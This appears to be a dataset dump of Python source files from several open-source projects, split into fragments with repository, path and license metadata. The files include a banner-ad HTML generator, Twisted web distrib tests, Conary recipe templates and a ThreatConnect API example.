"""Generates HTML for HTML5 banner ads."""
def __init__(self):
self.logger = logging.getLogger(__name__)
super(Main, self).__init__()
# def copy_files(self):
# """Copy files."""
# dest = os.path.join(self.input_dir, 'js')
# if not os.path.isdir(dest):
# if self.verbose:
# logmsg.info('Creating "js" direct
|
ory...')
# shutil.copytree(self.get_data('js'), dest)
# else:
# if self.verbose:
# logmsg.warning('"js" directory already exists')
@staticmethod
def replace_all(text, dict):
"""Replace all."""
for src, target in six.iteritems(dict):
text = text.replace(src, target)
return text
|
def create_divs(self, dirpath):
jpg_files = self.get_files_matching(dirpath, '*.jpg')
png_files = self.get_files_matching(dirpath, '*.png')
all_files = jpg_files + png_files
output = ''
for f in all_files:
basename = os.path.basename(f)
name = os.path.splitext(basename)[0]
if basename in self.ignore_list:
continue
output += '<div id="{0}"></div>\n'.format(name)
# soup=BeautifulSoup(output, "html.parser")
# pretty_html=soup.prettify()
return output
def create_html(self, filename):
"""
Create a HTML file for an ad.
:param str size: width x height (eg - 300x250)
:param str name: output file name
:rtype bool:
"""
# get filename and extension
# basename = os.path.basename(filename)
# name = os.path.splitext(basename)[0]
dirpath = os.path.dirname(filename)
# get size
# size = self.get_size_from_filename(name)
size = self.get_size_from_dirname(filename)
# get width height based on size string (eg - 300x250)
width, height = size.split('x')
# create divs
divs = self.create_divs(dirpath)
# open the template and open a new file for writing
html = pkg_resources.resource_string(__name__, 'templates/' + self.type + '/index.html').decode("utf-8")
#print(html)
outfile = open(filename, 'w')
# replace the variables with the correct value
replacements = {
# '{{filename}}': name,
# '{{size}}': size,
'{{width}}': width,
'{{height}}': height,
'{{divs}}': divs,
}
html = Main.replace_all(html, replacements)
outfile.write(html)
outfile.close()
logmsg.success('"{0}" generated successfully'.format(filename))
def generate_html(self, dirs):
"""
Loop through all folders in the input directory and create an HTML page.
"""
num_files = 0
for d in dirs:
filepath = os.path.join(d, 'index.html')
if not os.path.exists(filepath):
self.create_html(filepath)
num_files+=1
else:
logmsg.warning('"{0}" already exists'.format(filepath))
logmsg.success('Generated {0} HTML files'.format(num_files))
def get_parser(self):
"""Return the parsed command line arguments."""
parser = argparse.ArgumentParser(
description='Generate HTML for banners..')
parser.add_argument('type', choices=['doubleclick', 'sizemek', 'adwords', 'dcm'], help='Ad type')
parser.add_argument('-l', '--log', help='Enable logging',
action='store_true')
return parser.parse_args()
def run(self):
"""Run script."""
config = self.get_config()
args = self.get_parser()
if args.log:
self.create_logger()
self.logger.debug('-' * 10)
self.type = args.type
self.input_dir = config.get('html5', 'input')
self.ignore_list = self.create_list(config.get('html5', 'exclude_list'))
# Check if the input dir exists
if not os.path.isdir(self.input_dir):
logmsg.error('"{0}" does not exist'.format(self.input_dir))
sys.exit()
# Do the stuff we came here to do
dirs = self.find_ad_dirs()
self.generate_html(dirs)
logmsg.success('HTML Generated')
# -----------------------------------------------------------------------------
def main():
"""Main script."""
script = Main()
script.run()
# -----------------------------------------------------------------------------
if __name__ == "__main__":
main()
|
Aurous/Magic-Discord-Bot
|
discord/__init__.py
|
Python
|
gpl-3.0
| 1,365 | 0.001465 |
# -*- coding: utf-8 -*-
"""
Discord API Wrapper
~~~~~~~~~~~~~~~~~~~
A basic wrapper for the Discord API.
:copyright: (c) 2
|
015-2016 Rapptz
:license: MIT, see LICENSE for more details.
"""
__title__ = 'discord'
__author__ = 'Rapptz'
__license__ = 'MIT'
__copyright__ = 'Copyright 2015-2016 Rapptz'
__version__ = '0.11.0'
from .client import Client, AppInfo, ChannelPermissions
from .user import User
from .game import Game
from .channel import Channel, PrivateChannel
from .server import Server
from .member import Member, VoiceState
from .message import Message
from .errors import *
from .calls import CallMessage, GroupCall
from
|
.permissions import Permissions, PermissionOverwrite
from .role import Role
from .colour import Color, Colour
from .invite import Invite
from .object import Object
from . import utils, opus, compat
from .voice_client import VoiceClient
from .enums import ChannelType, ServerRegion, Status, MessageType
from collections import namedtuple
import logging
VersionInfo = namedtuple('VersionInfo', 'major minor micro releaselevel serial')
version_info = VersionInfo(major=0, minor=11, micro=0, releaselevel='final', serial=0)
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
|
Donkyhotay/MoonPy
|
twisted/web/test/test_distrib.py
|
Python
|
gpl-3.0
| 9,985 | 0.002203 |
# Copyright (c) 2008-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.distrib}.
"""
from os.path import abspath
from xml.dom.minidom import parseString
try:
import pwd
except ImportError:
pwd = None
from zope.interface.verify import verifyObject
from twisted.python import log, filepath
from twisted.internet import reactor, defer
from twisted.trial import unittest
from twisted.spread import pb
from twisted.web import http, distrib, client, resource, static, server
from twisted.web.test.test_web import DummyRequest
from twisted.web.test._util import _render
class MySite(server.Site):
def stopFactory(self):
if hasattr(self, "logFile"):
if self.logFile != log.logfile:
self.logFile.close()
del self.logFile
class PBServerFactory(pb.PBServerFactory):
def buildProtocol(self, addr):
self.proto = pb.PBServerFactory.buildProtocol(self, addr)
return self.proto
class DistribTest(unittest.TestCase):
port1 = None
port2 = None
sub = None
f1 = None
def tearDown(self):
dl = [defer.Deferred(), defer.Deferred()]
if self.f1 is not None:
self.f1.proto.notifyOnDisconnect(lambda: dl[0].callback(None))
else:
dl[0].callback(None)
if self.sub is not None:
self.sub.publisher.broker.notifyOnDisconnect(
lambda: dl[1].callback(None))
self.sub.publisher.broker.transport.loseConnection()
else:
dl[1].callback(None)
http._logDateTimeStop()
if self.port1 is not None:
dl.append(self.port1.stopListening())
if self.port2 is not None:
dl.append(self.port2.stopListening())
return defer.gatherResults(dl)
def testDistrib(self):
# site1 is the publisher
r1 = resource.Resource()
r1.putChild("there", static.Data("root", "text/plain"))
site1 = server.Site(r1)
self.f1 = PBServerFactory(distrib.ResourcePublisher(site1))
self.port1 = reactor.listenTCP(0, self.f1)
self.sub = distrib.ResourceSubscription("127.0.0.1",
self.port1.getHost().port)
r2 = resource.Resource()
r2.putChild("here", self.sub)
f2 = MySite(r2)
self.port2 = reactor.listenTCP(0, f2)
d = client.getPage("http://127.0.0.1:%d/here/there" % \
self.port2.getHost().port)
d.addCallback(self.failUnlessEqual, 'root')
return d
def test_requestHeaders(self):
"""
The request headers are available on the request object passed to a
distributed resource's C{render} method.
"""
requestHeaders = {}
class ReportRequestHeaders(resource.Resource):
def render(self, request):
requestHeaders.update(dict(
request.requestHeaders.getAllRawHeaders()))
return ""
distribRoot = resource.Resource()
distribRoot.putChild("headers", ReportRequestHeaders())
distribSite = server.Site(distribRoot)
self.f1 = distribFactory = PBServerFactory(
distrib.ResourcePublisher(distribSite))
distribPort = reactor.listenTCP(
0, distribFactory, interface="127.0.0.1")
self.addCleanup(distribPort.stopListening)
addr = distribPort.getHost()
self.sub = mainRoot = distrib.ResourceSubscription(
addr.host, addr.port)
mainSite = server.Site(mainRoot)
mainPort = reactor.listenTCP(0, mainSite, interface="127.0.0.1")
self.addCleanup(mainPort.stopListening)
mainAddr = mainPort.getHost()
request = client.getPage("http://%s:%s/headers" % (
mainAddr.host, mainAddr.port),
headers={'foo': 'b
|
ar'})
def cbRequested(result):
self.assertEquals(requestHeaders['Foo'], ['bar'])
request.addCallback(cbRequested)
re
|
turn request
def test_connectionLost(self):
"""
If there is an error issuing the request to the remote publisher, an
error response is returned.
"""
# Using pb.Root as a publisher will cause request calls to fail with an
# error every time. Just what we want to test.
self.f1 = serverFactory = PBServerFactory(pb.Root())
self.port1 = serverPort = reactor.listenTCP(0, serverFactory)
self.sub = subscription = distrib.ResourceSubscription(
"127.0.0.1", serverPort.getHost().port)
request = DummyRequest([''])
d = _render(subscription, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 500)
# This is the error we caused the request to fail with. It should
# have been logged.
self.assertEqual(len(self.flushLoggedErrors(pb.NoSuchMethod)), 1)
d.addCallback(cbRendered)
return d
class _PasswordDatabase:
def __init__(self, users):
self._users = users
def getpwall(self):
return iter(self._users)
def getpwnam(self, username):
for user in self._users:
if user[0] == username:
return user
raise KeyError()
class UserDirectoryTests(unittest.TestCase):
"""
Tests for L{UserDirectory}, a resource for listing all user resources
available on a system.
"""
def setUp(self):
self.alice = ('alice', 'x', 123, 456, 'Alice,,,', self.mktemp(), '/bin/sh')
self.bob = ('bob', 'x', 234, 567, 'Bob,,,', self.mktemp(), '/bin/sh')
self.database = _PasswordDatabase([self.alice, self.bob])
self.directory = distrib.UserDirectory(self.database)
def test_interface(self):
"""
L{UserDirectory} instances provide L{resource.IResource}.
"""
self.assertTrue(verifyObject(resource.IResource, self.directory))
def _404Test(self, name):
"""
Verify that requesting the C{name} child of C{self.directory} results
in a 404 response.
"""
request = DummyRequest([name])
result = self.directory.getChild(name, request)
d = _render(result, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_getInvalidUser(self):
"""
L{UserDirectory.getChild} returns a resource which renders a 404
response when passed a string which does not correspond to any known
user.
"""
return self._404Test('carol')
def test_getUserWithoutResource(self):
"""
L{UserDirectory.getChild} returns a resource which renders a 404
response when passed a string which corresponds to a known user who has
neither a user directory nor a user distrib socket.
"""
return self._404Test('alice')
def test_getPublicHTMLChild(self):
"""
L{UserDirectory.getChild} returns a L{static.File} instance when passed
the name of a user with a home directory containing a I{public_html}
directory.
"""
home = filepath.FilePath(self.bob[-2])
public_html = home.child('public_html')
public_html.makedirs()
request = DummyRequest(['bob'])
result = self.directory.getChild('bob', request)
self.assertIsInstance(result, static.File)
self.assertEqual(result.path, public_html.path)
def test_getDistribChild(self):
"""
L{UserDirectory.getChild} returns a L{ResourceSubscription} instance
when passed the name of a user suffixed with C{".twistd"} who has a
home directory containing a I{.twistd-web-pb} socket.
"""
home = filepath.FilePath(self.bob[-2])
home.makedirs()
web = home.child('.twistd-web-pb')
request = DummyRequest(['bob'])
result = self.directory.getChild('bob.twistd', request)
self.assertIsInstance(result, distrib.ResourceSubscription)
self.assertEqual(
|
fedora-conary/conary
|
conary/build/defaultrecipes.py
|
Python
|
apache-2.0
| 27,584 | 0.000435 |
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
BaseRequiresRecipe = '''
class BaseRequiresRecipe(Recipe):
"""
NAME
====
B{C{BaseRequiresRecipe}} - Base class which provides basic buildRequires
for all recipes that follow the PackageRecipe approach to instantiating
a destination directory.
SYNOPSIS
========
C{BaseRequiresRecipe} is inherited by the other *PackageRecipe,
DerivedPackageRecipe and *InfoRecipe super classes.
DESCRIPTION
===========
The C{BaseRequiresRecipe} class provides Conary recipes with references to
the essential troves which offer Conary's packaging requirements.
(python, sqlite, and conary)
Other PackageRecipe classes such as C{AutoPackageRecipe} inherit the
buildRequires offered by C{BaseRequiresRecipe}.
"""
name = "baserequires"
internalAbstractBaseClass = 1
buildRequires = [
'bash:runtime',
'conary-build:lib',
'conary-build:python',
'conary-build:runtime',
'conary:python',
'conary:runtime',
'coreutils:runtime',
'dev:runtime',
'filesystem:runtime',
'findutils:runtime',
'gawk:runtime',
'grep:runtime',
'python:lib',
'python:runtime',
'sed:runtime',
'setup:runtime',
'sqlite:lib',
]
_recipeType = None
'''
PackageRecipe = '''class PackageRecipe(SourcePackageRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{PackageRecipe}} - Base class which provides Conary functionality
SYNOPSIS
========
C{PackageRecipe} is inherited by the other *PackageRecipe super classes
DESCRIPTION
===========
The C{PackageRecipe} class provides Conary recipes with references to
the essential troves which offer Conary's packaging requirements.
(python, sqlite, gzip, bzip2, tar, cpio, and patch)
Other PackageRecipe classes such as C{AutoPackageRecipe} inherit the
functionality offered by C{PackageRecipe}.
EXAMPLE
=======
A sample class that uses PackageRecipe to download source code from
a web site, unpack it, run "make", then run "make install"::
class ExamplePackage(PackageRecipe):
name = 'example'
version = '1.0'
def setup(r):
r.addArchive('http://code.example.com/example/')
r.Make()
r.MakeInstall()
"""
name = 'package'
internalAbstractBaseClass = 1
buildRequires = [
'bzip2:runtime',
'gzip:runtime',
'tar:runtime',
'cpio:runtime',
'patch:runtime',
]'''
groupDescription = '''A group refers to a collection of references to specific troves
(specific name, specific version, and specific flavor); the troves
may define all the software required to install a system, or sets of
troves that are available for a system, or other groups. Each group
may contain any kind of trove, including other groups, and groups
may reference other groups built at the same time as well as other
groups that exist in a repository.'''
GroupRecipe = '''
class GroupRecipe(_GroupRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{r.GroupRecipe()}} - Provides the original type of recipe interface
for creating groups.
DESCRIPTION
===========
The C{r.GroupRecipe} class provides the original interface for creating
groups that are stored in a Conary repository.
''' + groupDescription + '''
Most C{r.GroupRecipe} user commands accept a B{groupName}
parameter. This parameter specifies the group a particular command
applies to. For example, C{r.add('foo', groupName='group-bar')}
attempts to add the trove I{foo} to the group I{group-bar}.
The group specified by B{groupName} must exist, or be created before
troves may be added to it. The B{groupName} parameter may also be a list
of groups in which case the command will be applied t
|
o all groups. If
B{groupName} is not specified, or is None, then the command will apply to
the current default group.
PARAMETERS
==========
Several parameters may be set at the time of group creation. Although
these parameters are typically passed to C{r.createGroup()} for the
base group, they should be set as variables in the recipe class.
Note: Setting these parameters affects not only the value for the base
gr
|
oup, but also the default value for all newly created groups. For
example, if B{autoResolve} is set to C{True} in the base group, all other
groups created will have autoResolve set to C{True} by default.
B{imageGroup} is an exception to this rule; it will not propogate to
sub groups.
The following parameters are accepted by C{r.GroupRecipe} with default
values indicated in parentheses when applicable:
B{depCheck} : (False) If set to C{True}, Conary will check for dependency
closure in this group, and raise an error if closure is not found.
B{autoResolve} : (False) If set to C{True}, Conary will include any extra
troves needed to make this group dependency complete.
B{checkOnlyByDefaultDeps} : (True) Conary only checks the
dependencies of troves that are installed by default, referenced in the
group. If set to C{False}, Conary will also check the dependencies of
B{byDefault} C{False} troves. Doing this, however, will prevent groups
with C{autoResolve}=C{True} from changing the C{byDefault} status of
required troves.
B{checkPathConflicts} : (True) Conary checks for path conflicts in each
group by default to ensure that the group can be installed without path
conflicts. Setting this parameter to C{False} will disable the check.
B{imageGroup} : (True) Indicates that this group defines a complete,
functioning system, as opposed to a group representing a system
component or a collection of multiple groups that might or might not
collectively define a complete, functioning system.
Image group policies will be executed separately for each image group.
This setting is recorded in the troveInfo for the group. This setting
does not propogate to subgroups.
METHODS
=======
The following methods are applicable in Conary group recipes:
- L{add} : Adds a trove to a group
- L{addAll} : Add all troves directly contained in a given reference
to groupName
- L{addNewGroup} : Adds one newly created group to another newly
created group
- L{addReference} : (Deprecated) Adds a reference to a trove
- L{createGroup} : Creates a new group
- L{copyComponents}: Add components to one group by copying them
from the components in another group
- L{moveComponents}: Add components to one group, removing them
from the other in the process.
- L{remove} : Removes a trove
- L{removeComponents} : Define components which should not be
installed
- L{removeItemsAlsoInGroup}: removes troves in the group specified
that are also in the current group
- L{removeItemsAlsoInNewGroup}: removes troves in the group specified
that are also in the current group
- L{Requires} : Defines a runtime requirement for group
- L{requireLatest} : Raise an error if add* commands resolve to older
trove than the latest on branch. This can occur when a flavor of
a trove exists that is not the latest version.
- L{replace} : Replace troves
- L{setByDefault} : Set troves to be
|
JohnHwee/show-me-the-code
|
Python/0052/main.py
|
Python
|
gpl-2.0
| 1,327 | 0.024115 |
import random
de
|
f markov_analysis( fname, n ):
"""Reads a text file and perfom Markov analysis.
Return a dictionary that maps from prefixes to a collection of suffixes.
fname: a text file
n: n order
"""
|
d = {}
prefix = tuple()
fin = open( fname )
for line in fin:
words = line.strip().split()
for word in words:
if len( prefix ) < 2:
prefix += ( word, )
break
# if there is no entry for this prefix,
#make one d[prefix] = [word]
if d.setdefault( prefix, [word] ):
d[prefix].append( word )
prefix = prefix[1:] + ( word, )
return d
def generate_random_text( suffix_map, n ):
"""Generates a random text with n words based on the Markov analysis.
"""
prefix = random.choice( suffix_map.keys() )
for i in range( n ):
suffixes = suffix_map.get( prefix, None )
if suffixes == None:
# if the start isn't in map, wo got to the end of the
# original text, so we have to start again.
generate_random_text( n - i )
return
word = random.choice( suffixes )
print word,
prefix = prefix[1:] + ( word, )
generate_random_text( markov_analysis( 'emma.txt', 2 ), 100 )
|
Lambdanaut/crits
|
crits/ips/migrate.py
|
Python
|
mit
| 869 | 0.003452 |
def migrate_ip(self):
"""
Migrate to the latest schema version.
"""
migrate_1_to_2(self)
migrate_2_to_3(self)
def migrate_2_to_3(self):
"""
Migrate from schema 2 to 3.
"""
if self.schema_version < 2:
migrate_1_to_2(self)
if self.schema_version == 2:
self.schema_version = 3
self.save()
self.reload()
def migrate_1_to_2(self):
"""
Migrate from schema 1 to 2.
"""
if self.schema_version < 1:
migrate_0_to_1(self)
if self.schema_version == 1:
from crits.core.core_migrate import migrate_analysis_results
migrate_analysis_results(self)
self.sch
|
ema_version = 2
self.save()
self.reload()
def migrate_0_to_1(self):
"""
Migrate from schema 0 to 1.
"""
if self.schema_version < 1:
self.schema_
|
version = 1
|
pyta-uoft/pyta
|
examples/ending_locations/async_for.py
|
Python
|
gpl-3.0
| 169 | 0 |
async def fun():
"""Note coroutine func
|
tion must be declared with async def."""
async for a in
|
b:
if a > 5:
break
else:
continue
|
3dfxsoftware/cbss-addons
|
issue_load/wizard/migrate.py
|
Python
|
gpl-2.0
| 6,250 | 0.00128 |
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 12 09:56:42 2012
@author: truiz
"""
from sys import argv
import xlrd
import xmlrpclib
from datetime import datetime
from ustr_test import ustr
def loadProjectsTasks(fileName, HOST, PORT, DB, USER, PASS):
ISSUES_PAGE = 0
TASKS_PAGE = 1
WORKS_PAGE = 2
''' Objects needed for rpc calls '''
url = 'http://%s:%d/xmlrpc/' % (HOST, PORT)
common_proxy = xmlrpclib.ServerProxy(url+'common')
object_proxy = xmlrpclib.ServerProxy(url+'object')
wizard_proxy = xmlrpclib.ServerProxy(url+'wizard')
workflow_proxy = xmlrpclib.ServerProxy(url+'workflow')
uid = common_proxy.login(DB, USER, PASS)
ID_ADDR = 1
def clean(cadena):
if isinstance(cadena, str):
return cadena and ustr(cadena).strip() or None
return cadena
def cleanDict(d):
res = {}
for k in d:
if not d[k] is None:
res.update({k: d[k]})
return res
def readSheet(fileName, nSheet):
# Open workbook
book = xlrd.open_workbook(fileName, formatting_info=True)
sheet = book.sheet_by_index(nSheet)
values = []
for T in range(sheet.nrows):
values.append([clean(v) for v in sheet.row_values(T)])
return values
def searchTasks(project_id, tasks):
res = []
for t in tasks:
if t[0] != 'ID':
if int(t[1]) == project_id:
res.append(t)
return res
def searchWorks(task_id, works):
res = []
for w in works:
if w[0] != 'ID TASK':
if int(w[0]) == task_id:
res.append(w)
return res
# Read project issue sheet
issues = readSheet(fileName, ISSUES_PAGE)
# Read project tasks sheet
tasks = readSheet(fileName, TASKS_PAGE)
# Read project work sheet
works = readSheet(fileName, WORKS_PAGE)
for issue in issues:
if issue[0] != 'ID':
if issue[4]:
user_mail = object_proxy.execute(
DB, uid, PASS, 'res.users', 'read', int(issue[4]),
['user_email'])
else:
user_mail['user_email'] = None
addr = issue[7] and (int(issue[
7]) == 3 and ID_ADDR or int(issue[7])) or None
values_issue = {
'name': ustr(issue[1]),
'categ_id': int(issue[3]),
'project_id': int(issue[2]),
'assigned_to': issue[4] and int(issue[4]) or None,
'type_id': int(issue[5]),
'partner_id': int(issue[6]),
'partner_address_id': addr,
'state': 'open',
'description': ustr(issue[8]),
'email_from': issue[4] and user_mail['user_email'] or None,
'active': True,
}
values_issue = cleanDict(values_issue)
project_id = object_proxy.execute(
DB, uid, PASS, 'project.issue', 'create', values_issue)
if project_id:
if issue[4]:
object_proxy.execute(DB, uid, PASS, 'project.issue',
'write', [
project_id],
{'assigned_to': int(issue[4]),
'user_id': int(issue[4])})
project_tasks = searchTasks(int(issue[0]), tasks)
if project_tasks:
for task in project_tasks:
values_tasks = {
'name': values_issue['name'],
'project_id': values_issue['project_id'],
'assigned_to': values_issue['assigned_to'],
|
'user_id': values_issue['assigned_to'],
'planned_hours': task[2],
'remaining_hours': task[3],
'type_id': values_issue['type_id'],
'partner_id': values_issue['partner_id'],
'state': 'open',
'date_start': datetime.now().strftime("%Y/%m/%d %H:%M:%S"
|
),
'date_end': datetime.now().strftime("%Y/%m/%d %H:%M:%S"),
'description': values_issue['description'],
}
values_tasks = cleanDict(values_tasks)
task_id = object_proxy.execute(
DB, uid, PASS, 'project.task', 'create', values_tasks)
if task_id:
object_proxy.execute(DB, uid, PASS,
'project.issue', 'write', [
project_id],
{'task_id': task_id})
task_works = searchWorks(int(task[0]), works)
if task_works:
for work in task_works:
values_works = {
'name': ustr(work[1]),
'hours': work[2],
'date': datetime.now().strftime("%Y/%m/%d %H:%M:%S"),
'user_id': values_issue['assigned_to'],
'task_id': task_id,
}
work_id = object_proxy.execute(
DB, uid, PASS, 'project.task.work',
'create', values_works)
if work_id:
object_proxy.execute(DB, uid, PASS,
'project.task', 'write', [
task_id], {'state': task[4]})
object_proxy.execute(DB, uid, PASS, 'project.issue', 'write', [
project_id], {'state': issue[9]})
|
ImEditor/ImEditor
|
src/interface/headerbar.py
|
Python
|
gpl-3.0
| 711 | 0.004219 |
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gio
UI_PATH = '/io/github/ImEditor/ui/'
class ImEditorHeaderBar():
__gtype_name__ = 'ImEditorHeaderBar'
def __init__(self):
builder = Gtk.Builder.new_from_resource(UI_PATH + 'headerbar.ui')
self.header_bar = builder.get_object('header_bar')
self.menu_button = builder.get_object('menu_button')
|
self.sele
|
ct_button = builder.get_object('select_button')
self.pencil_button = builder.get_object('pencil_button')
builder.add_from_resource(UI_PATH + 'menu.ui')
self.window_menu = builder.get_object('window-menu')
self.menu_button.set_menu_model(self.window_menu)
|
percipient/threatconnect-python
|
examples/commit/incidents_commit.py
|
Python
|
apache-2.0
| 8,526 | 0.002698 |
# -*- coding: utf-8 -*-
""" standard """
from random import randint
import re
""" custom """
from examples.working_init import *
from threatconnect.Config.ResourceType import ResourceType
#
# CHANGE FOR YOUR TESTING ENVIRONMENT
# - These incidents must be created before running this script
#
owner = 'Example Community' # org or community
lu_id = 34 # incident id for loop update
mu_id = 35 # incident id for manual update
# dl_id = 999999 # threat id to delete
adversary_id = 5 # adversary resource id to associate with incident
victim_id = 1 # victim resource id to associate with incident
ip_address = '10.20.30.40' # email address to associate to adversary
rn = randint(1, 1000) # random number generator for testing
def main():
""" """
# (Optional) SET THREAT CONNECT LOG (TCL) LEVEL
tc.set_tcl_file('log/tc.log', 'debug')
tc.set_tcl_console_level('critical')
# (Required) Instantiate a Resource Object
resources = tc.incidents()
#
# (Optional) retrieve results from API and update selected resource in loop
#
# filters can be set to limit search results
try:
filter1 = resources.add_filter()
filter1.add_owner(owner) # filter on owner
except AttributeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
try:
resources.retrieve()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
for res in resources:
# a particular resource can be matched by ID, Name or any other supported attribute
if res.id == lu_id:
#
# once a resource is matched any metadata on that resource can be updated
#
res.set_name('LU Incident #{0:d}'.format(rn))
# additional properties can be updated
res.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
#
# working with indicator associations
#
# existing indicator associations can be retrieved and iterated through
for association in res.indicator_associations:
# add delete flag to all indicator association that have a confidence under 10
if association.confidence < 10:
res.disassociate_indicator(association.resource_type, association.indicator)
# indicator associations can be added to a resource by providing the resource type and value
res.associate_indicator(ResourceType.ADDRESSES, ip_address)
#
# working with group associations
#
# existing group associations can be retrieved and iterated through
for association in res.group_associations:
# add delete flag to all group association that match DELETE
if re.findall('LU', association.name):
res.disassociate_group(association.resource_type, association.id)
# group associations can be added to a resource by providing the resource type and id
res.associate_group(ResourceType.ADVERSARIES, adversary_id)
#
# working with victim associations
#
# existing victim associations can be retrieved and iterated through
for association in res.victim_associations:
# add delete flag to all group association that match DELETE
if re.findall('LU', association.name):
res.disassociate_victim(association.id)
# victim associations can be added to a resource by providing the resource id
res.associate_victim(victim_id)
#
# working with attributes
#
# existing attributes can be loaded into the resource and iterated through
res.load_attributes()
for attribute in res.attributes:
# add delete flag to all attributes that have 'test' in the value.
if re.findall('test', attribute.value):
res.delete_attribute(attribute.id)
# add update flag to all attributes that have 'update' in the value.
if re.findall('update', attribute.value):
res.update_attribute(attribute.id, 'updated attribute #{0:d}'.format(rn))
# attributes can be added to a resource by providing the attribute type and value
res.add_attribute('Description', 'test attribute #{0:d}'.format(rn))
#
# working with tags
#
# existing tags can be loaded into the resource and iterated through
res.load_tags()
for tag in res.tags:
# add delete flag to all tags that have 'DELETE' in the name.
if re.findall('DELETE', tag.name):
res.delete_tag(tag.name)
# tags can be added to a resource by providing the tags value
res.add_tag('DELETE #{0:d}'.format(rn))
# (Required) commit this resource
try:
print('Updating resource {0!s}.'.format(res.name))
res.commit()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) delete resource if required
#
# delete to any resource that has 'DELETE' in the name.
elif re.findall('DELETE', res.name):
try:
print('Deleting resource {0!s}.'.format(res.name))
res.delete() # this action is equivalent to commit
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) ADD RESOURCE EXAMPLE
#
# new resources can be added with the resource add method
resource = resources.add('DELETE #{0:d}'.format(rn), owner)
# additional properties can be added
resource.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
# attributes can be added to the new resource
resource.add_attribute('Description', 'Delete Example #{0:d}'.format(rn))
# tags can be added to the new resource
resource.add_tag('TAG #{0:d}'.format(rn))
# the security label can be set on the new resource
resource.set_security_label('TLP Green')
# commit this resource and add attributes, tags and security labels
try:
print('Adding resource {0!s}.'.format(resource.name))
resource.commit()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) UPDATE RESOURCE EXAMPLE
#
# existing resources can also be updated with the resource add method
resource = resources.add('MU Incident #{0:d}'.format(rn), owner) # this will overwrite exising resource name
resource.set_id(mu_id) # set the id to the existing resource
# additional properties can be updated
resource.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
# existing attributes can be loaded for modification or deletion
resource.load_attributes()
for attribute in resource.attributes:
if attribute.type == 'Description':
resource.delete_attribute(attribute.id)
# attributes can be added to the existing resource
resource.add_attribute('Description', 'Manual Update Example #{0:d}'.format(rn))
# existing tags can be loaded for modification or deletion
resource.load_tags()
for tag in resource.tags:
resource.delete_tag(tag.name)
# tags can be added to the existing resource
resource.add_tag('TAG #{0:d}'.format(rn))
# commit this resource and add attributes, tags and security labels
try:
print('Updating resource {0!s}.'.format(resource.name))
resource.commit()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) DELETE RESOURCE EXAMPLE
|
#
# resources can be deleted with the resource add method
# resource = resources.add(''.format(rn), owner) # a valid
|
resource name is not required
# resource.set_id(dl
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.